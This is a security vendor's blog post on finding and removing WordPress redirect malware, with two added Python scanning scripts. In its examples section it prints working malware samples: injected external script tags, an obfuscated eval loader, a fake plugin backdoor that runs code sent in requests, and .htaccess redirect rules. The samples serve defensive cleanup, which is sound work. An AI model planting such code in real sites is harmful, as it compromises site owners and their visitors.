How To Remove Malicious Redirects From Your Site?

Nov 17, 2021

by

Is your WordPress website redirecting to another site right after you visit it? It can be confusing and stressful when this happens because there is no way to figure out what exactly is happening. These unauthorized redirects are a sign of a WordPress redirect hack on your website. 

Do not worry, because we can help you fix this.

First of all, you need to confirm that your WordPress site is hacked by scanning it. 

The WordPress hacked redirect issue can cause a lot of nuisance: website traffic gets diverted, your organic traffic suddenly drops, and the bounce rate skyrockets. But none of it does as much damage as losing the trust of your customers. Therefore, fixing these hacks quickly is essential. The more time you take to fix the WordPress redirection hack, the more damage it will cause.

TL;DR: Fix your WordPress site redirecting to spam with a best-in-class security plugin quickly. The longer you let a hack stay on your website, the worse it will get. Therefore, it is important to act quickly and clean up your website with MalCare.

What is a WordPress redirect hack?

A WordPress redirect hack is a symptom of malware being injected into your WordPress website. This malware redirects all your visitors to spam websites, which usually sell illegal items or pharma products that aren’t allowed to be marketed normally or are heavily restricted. In fact, advertising restricted products or services can get a Google Ads account suspended as well. 

WordPress hacked redirect infection

WordPress hacked redirect is a very common malware symptom affecting thousands of websites every day. While this hack is fixable, it is important to do so fast. Time is of utmost importance when dealing with hacks because the more you wait, the more files and database tables on your site are going to get affected.

How to know if your website is being redirected to another site?

If your WordPress site is redirecting to another spam site, it is a pretty good indication that your website is infected with the redirect hack malware. But the nature of this hack is such that it may not happen every time. In fact, hackers can program it so that it only happens once for each IP address, leading the admin to believe that it was a one-time issue. But the possibility of it being an incorrect redirect or a one-time glitch is almost negligible.

Therefore, we need to confirm the redirect hack before we can start fixing it. In order to figure out if your website has the WordPress redirect hack, you need to start by looking out for common symptoms and then confirm it with a proper scan. 

Look out for symptoms of WordPress redirect hack

There is no one symptom that can confirm a hack for you. WordPress redirect hack malware can manifest in a number of ways, and it is absolutely not predictable. However, some symptoms keep recurring over several cases. So if you notice more than two of these symptoms, chances are that your website has been hacked. 

  • WordPress site redirecting to spam site: The first and the most obvious symptom of a WordPress hacked redirect infection is the redirect itself. Some redirects may take your website visitors to a spam site whereas others may redirect you from the login page, effectively locking you out of your website. 
    • Automatic redirects: The most common type of redirects are automatic redirects. These directly take your visitors to spam sites from the website or even from Google search results. 
    • Link redirects: Link redirects change the destination of the visitor when they click on a link. Given that visitors expect to find a specific landing page after clicking on a link, this type of redirect is especially malicious. 
    • Mobile-only redirects: These redirects only take place if someone is visiting your website through a mobile device. 
  • Google results flag your website: Google is ultra-cautious about its users’ search experience and wants it to be safe. So if Google suspects malware on your website, it will show a ‘This site may be hacked’ message underneath the search results for your website. 
  • Google blacklist: Google blacklists over 10,000 websites every day to make sure that no dangerous website can harm its users. Getting on Google’s blacklist is a disaster for your website’s SEO efforts, as Google will delist your website. Moreover, many other browsers, search engines, and web hosts rely on Google’s blacklist to check for dangerous sites.
  • Google Ads flag scripts on your website: If you’re running ads on your website, Google can detect any redirection scripts on your page and flag your page. Google is especially careful about the safety of the ads that it runs, so the chances of false positives are very low. 
  • Web host has suspended your account: While web hosts may suspend your account for a number of reasons, malware is the most common one. You might receive an email from your web host regarding the reason for suspension. If not, you can always reach out to them for clarification, and ask them for the scan reports so that you have a head start on locating the malware. 
  • Visitor feedback: As we discussed before, malware is designed to be hidden from the admin. So you may not notice any symptoms at all, but your visitors will. So pay attention to any complaints or feedback that may come from your website visitors about random redirects.

If you notice these symptoms, do not panic. Instead, try to record information regarding these symptoms. Information can help you identify the exact nature of the hack and resolve it at the earliest.

Confirm the WordPress hacked redirect infection 

You know what to look out for, and have a fair idea of how hacks may manifest on your WordPress site, but it is still extremely important to confirm the WordPress redirect hack if you suspect it. Symptoms are not a foolproof way to do this, so scanning is essential.

Deep scan your website using a security plugin

The fastest and easiest way to scan your website for hacks is with a security plugin like MalCare. MalCare seamlessly syncs with your WordPress site and scans for hidden malware that is not easily discoverable. Scanning with it is as easy as this:

  1. Install MalCare on your website
  2. Allow MalCare to sync with your website
  3. Click on ‘Scan site’

You can set up MalCare for scheduled scans and let it scan your website regularly. If your website is hacked, it will alert you as soon as the hack is detected.

Scan using an online scanner

Online scanners are a great tool to use as the first step of your diagnostic process. These scanners go through the publicly visible parts of your website and scan them for malware. Given that malware can hide anywhere on your WordPress site, these are not entirely effective for complete diagnostics but can be used alongside other methods. 

Scan WordPress site manually

Scanning for WordPress hacked redirect malware manually is more than just tedious. And we would highly advise you against doing this. A security plugin can do this a lot more effectively and within a fraction of the time. 

Manual scanning is basically parsing through every line of your website code looking for ‘junk code.’ Given that malicious code is not consistent or even specific, it is akin to looking for a needle in a haystack. But if you need to scan manually, this is how you can do it.

One of the easiest ways to look for malware manually is to look at the recently modified files on your website. If you haven’t modified said files, chances are that they are infected. Make sure to repeat this process for the database as well.

However, this trick may not always work, as hackers can change the timestamps on files to mislead you, sometimes setting them back several months or days. 

Where to locate redirect malware

The WordPress redirect malware, like any other kind of malware, can hide anywhere on your WordPress site. And given that there are variants of the redirect malware, the code can look different for each one. So we really cannot offer an exact blueprint of code for you to look for, but if you understand your website code, you can look for strange code in the following places.

Files-

  • WordPress core files: The two primary folders in the WordPress core are wp-admin and wp-includes. These folders do not include any user content, so they should be identical to the fresh installs you can get on the WordPress repository. Make sure that the version you are comparing your website with is the same as the one installed on your site. If you find any extra code in these files, it could be malware.

The next file you need to look for is the .htaccess file. This file carries the traces of the WordPress mobile redirect hack, if it exists on your website. You can look for any redirect scripts on this file, and note them for a cleanup.

  • Active theme files: Your theme files are also a good place to look for malware. First, ensure that only one theme is active on your website, and then look into the header.php, footer.php, and functions.php files in the active theme folder. You can compare the code to fresh installs of the theme, but bear in mind that customizations can show up as extra code.
  • Plugin files: Malware can hide as fake plugins on your website to throw you off. A good way to look for fake plugins is to go to the wp-content folder and look at all the plugin files present there. If you notice any duplicates or oddly named plugins, chances are that they are malware. For example, we recently came across these:

/wp-content/plugins/wp-zzz/wp-zzz.php

/wp-content/plugins/Plugin/plug.php

Note: If you use nulled themes or plugins on your WordPress site, you don’t need to look further, because you have almost certainly been hacked through them. 

Database-

  • wp_posts table: Now you need to go through your database. In your wp_posts table, look into a good number of posts if you cannot go through all of them, because even though malware usually shows up on every single page, hackers can hide it to make it difficult for you to find.
  • wp_options table: In this table, look for the siteurl. If it isn’t your website URL, chances are that redirect malware has altered it to point to a spam website instead.

Other ways to look for malware

While scanning is the best way to confirm a WordPress redirect hack, there are other ways in which you can look for malware on your WordPress site. As the symptoms of hacks are not consistent, admins often leave hacks unattended for longer than they should. So regularly monitoring your website for any suspicious activity is extremely important.

Here are some ways in which you can look for the redirect malware on your website.

  • Use an incognito browser to visit your website. Hackers often design malware so that the symptoms aren’t visible to the admin. This way, you can see what the regular visitors see.
  • Check activity logs to see if you can find any unusual activity such as the creation of new posts or escalation of user privileges. If you don’t have an activity log, consider getting one. It is an invaluable aid for debugging anything that goes wrong on your website.  
  • Check Google search console and look up the security issues tab to see if Google has flagged any malware on your website.

How to remove WordPress hacked redirect infection from your site

Looking for and identifying malware on your website is only half the battle won. Now comes the most important part, which is the clean-up. Removing WordPress hacked redirect infection from your website can be done in two ways. You can either use a security plugin like MalCare, which will take care of all the heavy lifting for you and clean up your website in minutes, or you can do it manually. 

While manual clean-ups are possible, we absolutely do not recommend this course of action. There is a lot that can go wrong and it is a time-consuming endeavor. In the case of hacks, time is of the essence, so using a security plugin is the best course of action.

Clean your WordPress site with a security plugin

If you have already scanned your website with MalCare, we will show you how to clean up your website in the next section. If you have not, you will first need to install MalCare on your WordPress site and scan it. However, you can pick any security plugin to do this.

If your WordPress site is redirecting from the wp-login page, and you cannot access it to install the plugin, reach out to us and our emergency cleanup service will take care of it for you.

Now that you have MalCare installed, your scan will have alerted you of a hack. All you need to do is upgrade your account and click on the ‘Clean Site’ button.

It is as simple as that. MalCare will clean up your site within minutes. 

Remove redirect hack malware manually

Before we explain how you can manually clean your WordPress site, we would like to reiterate that this is not recommended, and there are numerous things that can go wrong when manually cleaning up your site. Many times, we get websites for cleanup that could have been cleaned in a matter of minutes, but manual cleaning efforts broke the site, and now the cleanup is a task and a half. So before you take this route, consider using a security plugin one more time.

If you still wish to clean up your site manually, here is how you can go about it step-by-step.

  1. Back up your website with BlogVault

The first step is to back your website up, preferably on a server separate from the one hosting your website. This is a failsafe in case the clean-up goes wrong or breaks your site. Even though your website is hacked right now, it is still a functional site, which is better than having to start from scratch. BlogVault allows you to take safe backups that are easy to restore and are stored on offsite servers.

  2. Download clean installs of WordPress

In order to clean your WordPress site, you need a reference for clean files. So you will need to download clean installs of WordPress core, themes, and plugins from the WordPress repository. It is extremely important to match the versions of these files with the ones on your website, to make sure that the base code is the same.

  3. Reinstall WordPress core

Now comes the actual cleanup part. You start by reinstalling the WordPress core files. You can entirely replace the wp-admin and wp-includes folders as they do not have any user content in them.

The next step is to look for any strange or suspicious code in the following files: 

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess

You will have to carefully remove any malware that you find in these files. Make sure that you are only deleting malware, or else your site can break or act erratically if you delete anything important. 

We cannot give you specifics on what to look for, because the malware can look like any other code. This is why you need a basic understanding of code logic to undertake manual cleanup of your site.

After you are done with this, take a look at the uploads folder (wp-content/uploads). Does it have any PHP files? If yes, delete them, as the uploads folder is not supposed to have any PHP files at all.

  4. Clean themes and plugins files

You can find the themes and plugins files in your website’s wp-content folder. Start by comparing each theme and plugin file with the fresh installs you downloaded from the repository. You can use an online diffchecker to compare, as going through every line of code manually can be a big undertaking.

Look for any changes in your version of the files, and try to determine if this is just a result of customization or actual malware, as customizing your themes or plugins can alter the code. Now, carefully delete the malware that you have found.

Look for any fake plugins or newly discovered vulnerabilities in the plugins that you use. If you haven’t updated your files after the vulnerability has been discovered, you will have to update the plugin, and look for malware in the plugin file.

  5. Clean database tables

You will have to repeat the same process for your database tables. In order to access your database tables, you can use phpMyAdmin. Look for the malware in the following tables specifically:

  • wp_posts
  • wp_options

If you have noted down the malware in the scanning process, you can carefully delete the malicious script from your database tables and clean it up.

  6. Remove backdoors

Once the cleaning is done, you will have to fix the cause of the hack. Hacks often occur due to backdoors on your website. A backdoor is a loophole in the website code that hackers exploit to gain access to your website. Unless you remove these backdoors, your website can be hacked again just as easily.

You can look for the following keywords that often are a part of backdoors:

  • eval
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

However, these keywords don’t necessarily signal malware. They are sometimes used in legitimate themes and plugins as well.

  7. Reupload clean files

It is now time to reupload clean files to your WordPress site. You will need to use both File Manager and phpMyAdmin for this purpose. The process is very similar to manually restoring a backup, so you can take a look at our comprehensive guide on restoring backups for additional instruction. 

You will first have to delete the files one by one and then upload the cleaned versions to your WordPress site. 

  8. Remove cache

You are almost there. Even though you have cleaned your website, there may still be traces of malware on it. This happens because the website cache stores a version of your site for faster loading. This version could also have malware in it. Therefore, in order to completely rid your website of malware, you need to clean the cache entirely.

  9. Use a security scanner to confirm

Congratulate yourself, your clean-up is done! In order to confirm that the cleanup was successful, use a security scanner to scan your site. If it finds no traces of malware, you are good to go. If not, you may want to look into other options for cleaning.
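The checks from the core reinstall, uploads folder and backdoor steps above can be scripted, and comparing core files by content hash avoids relying on timestamps that an attacker may have changed. The following is an added example, not code from the original article or from MalCare; the function names and the demo directory tree are assumptions constructed for illustration.

```python
import hashlib
import os
import re
import sys
import tempfile

CORE_DIRS = ("wp-admin", "wp-includes")
PHP_EXT = (".php", ".phtml", ".phar")
# Keywords the article lists for backdoors; a hit is a lead to review, not proof.
KEYWORD_RE = re.compile(rb"\b(eval|base64_decode|gzinflate|preg_replace|str_rot13)\s*\(")

def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def relative_files(root):
    """Yield every file under root as a '/'-separated path relative to root."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            yield rel.replace(os.sep, "/")

def compare_core(site_root, clean_root):
    """Compare the core folders with a clean copy by content hash, not timestamp."""
    findings = []
    for core in CORE_DIRS:
        site_dir = os.path.join(site_root, core)
        clean_dir = os.path.join(clean_root, core)
        site = set(relative_files(site_dir))
        clean = set(relative_files(clean_dir))
        findings += [("extra", f"{core}/{rel}") for rel in sorted(site - clean)]
        findings += [("missing", f"{core}/{rel}") for rel in sorted(clean - site)]
        for rel in sorted(site & clean):
            if sha256_file(os.path.join(site_dir, rel)) != sha256_file(os.path.join(clean_dir, rel)):
                findings.append(("modified", f"{core}/{rel}"))
    return findings

def php_in_uploads(site_root):
    """List PHP files under wp-content/uploads, which should contain none."""
    uploads = os.path.join(site_root, "wp-content", "uploads")
    return sorted(f"wp-content/uploads/{rel}" for rel in relative_files(uploads)
                  if rel.lower().endswith(PHP_EXT))

def keyword_hits(site_root):
    """Map each PHP file under wp-content to the listed keywords it calls."""
    hits = {}
    content = os.path.join(site_root, "wp-content")
    for rel in relative_files(content):
        if not rel.lower().endswith(PHP_EXT):
            continue
        with open(os.path.join(content, rel), "rb") as fh:
            found = sorted({m.group(1).decode() for m in KEYWORD_RE.finditer(fh.read())})
        if found:
            hits[f"wp-content/{rel}"] = found
    return hits

def write_demo_tree(base):
    """Create a small constructed site and clean copy under base (demo data only)."""
    files = {
        "clean/wp-admin/index.php": "<?php // admin",
        "clean/wp-includes/version.php": "<?php $wp_version = 'x';",
        "site/wp-admin/index.php": "<?php // admin",
        "site/wp-admin/extra.php": "<?php // not in the clean copy",
        "site/wp-includes/version.php": "<?php $wp_version = 'x'; // appended line",
        "site/wp-content/uploads/2021/11/img.php": "<?php echo 1;",
        "site/wp-content/plugins/demo/demo.php": "<?php $x = base64_decode($y); evaluate();",
    }
    for rel, text in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    return os.path.join(base, "site"), os.path.join(base, "clean")

def report(site_root, clean_root):
    lines = [f"core {s}: {p}" for s, p in compare_core(site_root, clean_root)]
    lines += [f"php in uploads: {p}" for p in php_in_uploads(site_root)]
    lines += [f"keyword {', '.join(w)}: {p}" for p, w in sorted(keyword_hits(site_root).items())]
    return lines

if __name__ == "__main__":
    if len(sys.argv) == 3:  # SITE_ROOT CLEAN_WORDPRESS_ROOT (same version as the site)
        print("\n".join(report(sys.argv[1], sys.argv[2])))
    else:  # no arguments: run against the constructed demo tree
        with tempfile.TemporaryDirectory() as tmp:
            print("\n".join(report(*write_demo_tree(tmp))))
```

The fake plugin sample later on this page assembles the name base64_decode from chr() fragments, so only its eval call would match the keyword list.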

What does the WordPress redirect hack malware look like?

There is no one way that malware appears, especially when it comes to malware that is as versatile as the WordPress redirect. But we have a few examples to show you how it can appear on your website. It bears repeating that you should not rely on these examples for diagnosing your website; they are only meant to offer a reference.

  • Some code that you can find in the wp_posts table or hidden in a page header may look like this.
    <script type='text/javascript' src='//www.dekernonline.nl/wp-content/count.php?s=8131599557550&#038;ver=5.7.2' id='hello_newscript5-js'></script>
    <script type='text/javascript' src='https://store.dontkinhooot.tw/m.js?w=085'></script>
    <script type='text/javascript' async src='https://db.deliverygoodstrategy.com/js.min.js?s=p&'></script>
    <script type='text/javascript' src='https://count.trackstatisticsss.com/stm?v=l6.0.0'></script>
    <script type=text/javascript src='https://dest.collectfasttracks.com/t.js'></script>
    <script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>

  • The wp_options table may also hide the redirect malware, which can sometimes look like this.
    stat.trackstatisticsss.com
    dest.collectfasttracks.com
    gotosecond2.com
    ws.stivenfernando.com

  • The malware code is often obfuscated, and you will have to deobfuscate it using online tools. The obfuscated code can look like the following.
eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118,97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32,32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59));')

When deobfuscated, it looks like this.

    (function() {
        var po = document.createElement('script');
        po.type = 'text/javascript';
        po.src = 'https://js.developerstatss.ga/stat.js?v=n4';
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(po, s);
    })();

  • Malware often hides in fake plugins, and when you open the files, it looks like this.
    <?php
    /**
     * Plugin Name: Wp Zzz
     * Plugin URI: https://wpforms.com
     * Description: Default WordPress plugin
     * Author: WPForms
     * Author URI: https://wpforms.com
     * Version: 1.6.3.1
     *
     */
    function simple_init() {
        $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";
        if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {
            $n = "file_put_contents";
            $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}
        }else{
            if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}
        }
    }
    add_action('init','simple_init');
    function my_custom_js() {
        echo '<script type="text/javascript" src="https://port.transandfiestas.ga/js.php?from=l&sid=346"></script>';
    }
    add_action( 'admin_head', 'my_custom_js' );
    add_action( 'wp_head', 'my_custom_js' );

  • Mobile specific redirect malware can look something like this. You can find it in the .htaccess file.
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L]
    RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L]
    RewriteRule ^.+\.html$ https://bit.ly/3iZl8mm [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . https://bit.ly/3iZl8mm [L]
    </IfModule>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>
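The sample forms above (injected script tags, a String.fromCharCode payload and .htaccess rewrite rules) all end in an off-site destination, so a dump of page source, database rows or .htaccess can be triaged by listing those destinations without executing anything. This is an added example, not code from the original article or from MalCare; the function names, the own-host allowlist and the .invalid sample hosts are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Numeric payload of String.fromCharCode(...), decoded statically (never eval'd).
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
# src attribute of a <script> tag, and a JavaScript assignment such as po.src = '...'.
SCRIPT_TAG_RE = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*(['"])(.*?)\1""", re.I)
JS_SRC_RE = re.compile(r"""\.src\s*=\s*(['"])(.*?)\1""")
# RewriteRule whose substitution is an absolute URL (a redirect off the site).
REWRITE_RE = re.compile(r"RewriteRule\s+\S+\s+(https?://\S+)", re.I)

def decode_charcodes(text):
    """Return the strings hidden in String.fromCharCode(...) calls."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(n) for n in re.findall(r"\d+", match.group(1))]
        decoded.append("".join(chr(c) for c in codes if c < 0x110000))
    return decoded

def host_of(url):
    """Return the lower-cased host of a URL, or '' for relative paths."""
    if url.startswith("//"):  # protocol-relative, common in injected tags
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()

def external_destinations(text, own_hosts):
    """Return sorted (kind, host) pairs for every destination outside own_hosts."""
    own = {h.lower() for h in own_hosts}
    found = set()
    layers = [("script-src", text)]
    layers += [("obfuscated-script-src", d) for d in decode_charcodes(text)]
    for kind, body in layers:
        for regex in (SCRIPT_TAG_RE, JS_SRC_RE):
            for match in regex.finditer(body):
                host = host_of(match.group(2))
                if host and host not in own:
                    found.add((kind, host))
    for match in REWRITE_RE.finditer(text):
        host = host_of(match.group(1))
        if host and host not in own:
            found.add(("rewrite-target", host))
    return sorted(found)

def constructed_sample():
    """Build a constructed input; every host is a placeholder under .invalid."""
    hidden = "var po=document.createElement('script');po.src='https://js.tracker.invalid/stat.js';"
    return "\n".join([
        "<script src='/wp-includes/js/jquery.js'></script>",
        "<script type='text/javascript' src='//cdn.counter.invalid/m.js?w=1'></script>",
        "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in hidden) + "));",
        "RewriteRule ^.+\\.html$ https://short.invalid/abc [L]",
        "RewriteRule . index.php [L]",
    ])

if __name__ == "__main__":
    for kind, host in external_destinations(constructed_sample(), {"example.com"}):
        print(f"{kind}: {host}")
```

Pass every host the site legitimately loads scripts from in own_hosts; whatever remains in the output is a destination to review.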

How did your site get infected with the WordPress redirect hack?

After this rollercoaster ride through cleaning up your website, you might wonder how your website got infected with the WordPress redirection hack in the first place? There are several reasons this could have happened, and we will take a look at them, but first let’s understand why websites get hacked at all.

WordPress websites are designed for functionality and customization, which means that each WordPress site is a labyrinth of code. Essentially, this code cannot be bulletproof because it is written by someone, and there is always scope for human error. So while you can make your WordPress site as close to bulletproof as possible with the right security practices, it remains vulnerable without them.

Some of the most likely reasons for your site getting infected with the WordPress redirect hack are:

Whatever the reason may be, you can always prevent hacks with the right security practices, and limit the damage from any malware to the bare minimum. All you need to do is buff up your website security with some simple practices.

How to prevent WordPress redirection hack in the future?

The nature of hacks is such that they keep reappearing. This is often because most people don’t realize that website security is not a one-time exercise. You need a proper plan and protective measures that will keep your WordPress website from getting hacked and redirected to spam sites again. This does not mean that you are doomed. In fact, you can avoid getting hacked if you only implement a few measures.

Use a security plugin

A security plugin is important not just to scan and clean your website, but also to protect it and alert you in time if any malware gets in. A complete security solution like MalCare offers a firewall that blocks brute force attacks, regularly scheduled automatic scans that ensure that your website health is maintained, and timely alerts that help you take action immediately if there is a security incident. 

Install SSL

SSL allows you to encrypt any communication that happens to and from your website. This means that no one can intercept the data being sent or received to your website and try to gain unauthorized access. Installing SSL will also help you improve your SEO as Google actively penalizes non-SSL sites.

Update your WordPress core, themes, and plugins

Your website is made up of code, and where there is code, there are vulnerabilities. These vulnerabilities are patched as soon as they are discovered, however. And you can protect your website from attacks by simply updating your WordPress core, themes, and plugins regularly. You can update everything safely by installing a backup plugin like BlogVault and making sure you use a staging server to check the results before pushing updates to your live site.

Choose strong passwords

Weak passwords are still the leading cause of hacks. And while it may be difficult to remember strong passwords, you don’t have to. You can use a password manager that stores all your passwords, making it easy for you to log in as well as secure your website.

Harden WordPress

There is a list of measures that WordPress recommends to better secure your WordPress site, such as two-factor authentication, blocking PHP execution in certain folders, etc. These measures together are known as WordPress hardening. MalCare helps you do all of this with a click of the button, making it completely hassle-free.

Create and follow a website security plan

Finally, it is important to keep in mind that website security is an ongoing process. And in order to secure your website, you need a plan. Create a comprehensive security plan with measures and timelines, and follow it to avoid any future hacks.

Impact of WordPress site redirecting to spam sites

When your WordPress website is being redirected to another spam site, it is obviously bad for you because of the hack. But the impact of a redirect hack is much wider than bad user experience. WordPress redirection hack can cause a lot of headaches if not fixed in time.

Revenue loss

Redirects essentially break the flow of customer behavior on your website. If they were meant to visit your site and browse your products, it won’t happen because they were redirected to a spam site before they could get to the products. This affects your conversions and results in revenue loss. This loss is magnified several times if the hack is not fixed in time.

Data loss

The redirects that occur due to the malware are only one of the symptoms of the hack. The much more worrying symptom is that the hackers have access to your website now. This means that they are privy to your and your customers’ confidential data. They could choose to sell the data, or wipe it out entirely and cost you more than just money.

Customers lose trust

When a business is hacked, it often creates distrust among customers. In case of hacks that aren’t visible to the customers the damage control can be easier. But the redirect hack on your WordPress site is visible to your customers and it can lead to customers completely losing trust in the safety of your business.

SEO impact

Search engines do not want their users to accidentally visit hacked sites. So they penalize sites that have malware. This could mean they attach a warning under your website in the search results, show a big red warning before they visit it, or even completely delist you. This hampers your SEO efforts and you will definitely notice a drop in your organic traffic.

Legal repercussions

In many regions, data laws are stringent and do not allow for third-party sharing without consent. If your data is breached, even as a result of a hack, you may be liable for legal consequences.

Conclusion

A WordPress redirect hack is one of the most common hacks out there, but it is still extremely damaging for a business. The good news is that if you take action in time, you can mitigate the risks quite easily.

Security plugins are designed to help you avoid hacks like these through firewalls, and alert you instantly if it occurs. This helps you save precious hours that could be the difference between a close call and a big loss. We recommend MalCare for its ever-evolving algorithm and intelligent firewall, but using any security plugin is a good start to your website security plan.

FAQs

My website is being redirected to another site. What should I do?

If your WordPress website is redirecting to another site or spam pages, your website is most likely hacked with the WordPress redirect hack malware. You will have to confirm the hack by scanning your website for free with a security plugin like MalCare.

If it detects a hack, all you need to do is upgrade your account and click on the auto-clean button. And your site will be clean in minutes!

Why does my website redirect to spam from Google?

The most common reason for spam redirects is the WordPress hacked redirect infection. This hack redirects your visitors to spam sites in order to piggyback on your site and gain more visitors. These spam sites usually sell illegal products or pharmaceuticals that they cannot advertise directly.

How to detect a WordPress malware redirect hack?

The strongest symptom of a WordPress spam redirect hack is if your website is redirecting to a spam site. However, hackers don’t want you to find the hack, so they add conditions that make it invisible to the admin. So you may not notice the redirects at all. 

In this case, you need to scan your website with MalCare. MalCare will scan your website thoroughly and detect any hacks instantly, so that you can start the cleanup process.

How do I fix my WordPress site redirecting to spam?

In order to clean up your WordPress site that is redirecting to spam, you need to follow these instructions:

  1. Install a security plugin like MalCare on your WordPress site.
  2. Click on the ‘Scan Site’ button to start the scanning process.
  3. Once MalCare detects hacks, it will alert you. Click on the ‘auto-clean’ button.

That’s it, your website will be free of the WordPress malware redirect hack in no time.